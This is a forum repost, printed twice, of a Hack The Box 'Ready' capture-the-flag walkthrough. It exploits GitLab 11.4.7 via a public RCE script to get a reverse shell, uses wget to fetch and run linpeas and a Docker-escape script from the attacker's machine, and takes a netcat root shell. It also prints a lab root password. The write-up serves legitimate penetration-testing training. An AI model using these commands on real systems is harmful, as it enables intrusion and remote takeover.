CyberCrime
Content Viral Loop Creator
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Ready,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. The challenge was designed by bertolis.
Level: Medium
Task: Find user.txt and root.txt in the victim’s machine
Penetration Methodologies
Scanning
Enumeration
Exploitation
Privilege Escalation
Capturing the flag
Walkthrough
Network Scanning
Let’s get started then!
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned to Ready machine: 10.129.149.69
Let us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine
From the result above we found two working ports on the VM, ports that ran services such as SSH(22), NGINX(5080).
Since we don’t have the credentials for the SSH so we cannot enumerate it. The only service that is left is the NGINX service.
Enumeration
Starting with the nginx service, we try to enumerate by accessing the IP Address and port of the target machine on a Web Browser. We see a website that features gitlab service and redirects us to sign-in page.
Since there is a registration option so we immediately went to the register page to see if we can register.
Once registered, we noticed that it says “update asap” in red, usually, if we see a web application that is running an old version then there are high chances that the version will have several vulnerabilities.
Next, we searched for an exploit of GitLab version 11.4.7 on the searchsploit and we found a remote code execution (RCE) exploit is available. So, we quickly downloaded the available RCE exploit to our local machine and checked for required parameters.
Exploitation
Since it is a python file, we executed it to take reverse shell by running it with required parameters.
Next, we started netcat listener on port 1234 in another terminal which successfully gave us a simple reverse shell of the user.
To access the proper terminal, we run following python one-liner command.
So, to exploit further to get root shell, we uploaded linpeas from local machine to victim machine, the script will look for possible paths to escalate privileges.
Privilege Escalation
The result below from linpeas tell us that we are in docker container, so we do some enumeration.
After enumeration we found gitlab.rb inside the directory /opt/backup and the file contains SMTP user login credentials. The credentials are useful for us if they are used by other users such as root. So, when we tried to login as root, and we successfully logged in.
But when we looked for root.txt it was not present in the root directory because we are in privilege docker container which can be escaped to get the root flag.
Escaping docker container
So, to get the root flag and to escape docker container we created a bash on our local machine with the help of the article here.
Next, we started python one liner SimpleHttpServer in our local machine to transfer the file from our machine to victim machine.
On the victim machine, we move into the tmp directory and used wget to download the bash that was hosted on our local machine. We changed its permissions to make it executable and then ran it.
Finally, we started the netcat listener on port 9000 in another terminal which gave us a reverse shell of the root user.
Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.
Level: Medium
Task: Find user.txt and root.txt in the victim’s machine
Penetration Methodologies
Scanning
- Nmap
Enumeration
- Browsing HTTP service
- Enumerating Gitlab pages
Exploitation
- Exploiting Gitlab 11.4.7 RCE
- Spawning TTY Shell
- Linpeas to search for possible paths to escalate privileges
Privilege Escalation
- Escaping privilege docker container
- Uploading bash script to gain root access
Capturing the flag
Walkthrough
Network Scanning
Let’s get started then!
To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.
IP Address assigned to Ready machine: 10.129.149.69
Let us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine
Code:
nmap -A 10.129.149.69From the result above we found two working ports on the VM, ports that ran services such as SSH(22), NGINX(5080).
Since we don’t have the credentials for the SSH so we cannot enumerate it. The only service that is left is the NGINX service.
Enumeration
Starting with the nginx service, we try to enumerate by accessing the IP Address and port of the target machine on a Web Browser. We see a website that features gitlab service and redirects us to sign-in page.
Since there is a registration option so we immediately went to the register page to see if we can register.
Once registered, we noticed that it says “update asap” in red, usually, if we see a web application that is running an old version then there are high chances that the version will have several vulnerabilities.
Next, we searched for an exploit of GitLab version 11.4.7 on the searchsploit and we found a remote code execution (RCE) exploit is available. So, we quickly downloaded the available RCE exploit to our local machine and checked for required parameters.
Code:
searchsploit gitlab 11.4.7
searchsploit -m 49334
cat 49334.pyExploitation
Since it is a python file, we executed it to take reverse shell by running it with required parameters.
Code:
python3 49334.py -g http://10.129.149.69 -u ignite -p 12345678 -l 10.10.14.108 -P 1234Next, we started netcat listener on port 1234 in another terminal which successfully gave us a simple reverse shell of the user.
Code:
nc -lvp 1234
idTo access the proper terminal, we run following python one-liner command.
Code:
python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /tmpSo, to exploit further to get root shell, we uploaded linpeas from local machine to victim machine, the script will look for possible paths to escalate privileges.
Code:
wget 10.10.14.108:8000/linpeas.sh
chmod 777 linpeas.sh
./linpeas.shPrivilege Escalation
The result below from linpeas tell us that we are in docker container, so we do some enumeration.
After enumeration we found gitlab.rb inside the directory /opt/backup and the file contains SMTP user login credentials. The credentials are useful for us if they are used by other users such as root. So, when we tried to login as root, and we successfully logged in.
But when we looked for root.txt it was not present in the root directory because we are in privilege docker container which can be escaped to get the root flag.
Code:
cd /opt
ls
cd /backup
ls
cat gitlab.rb | grep password
su root
Password : wW59U!ZKMbG9+*#hEscaping docker container
So, to get the root flag and to escape docker container we created a bash on our local machine with the help of the article here.
Next, we started python one liner SimpleHttpServer in our local machine to transfer the file from our machine to victim machine.
On the victim machine, we move into the tmp directory and used wget to download the bash that was hosted on our local machine. We changed its permissions to make it executable and then ran it.
Code:
cd /tmp
wget 10.10.14.108:8000/raj.sh
chmod 777 raj.sh
./raj.shFinally, we started the netcat listener on port 9000 in another terminal which gave us a reverse shell of the root user.
Code:
nc -lvp 9000
cd /root
ls
cat root.txtAuthor: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.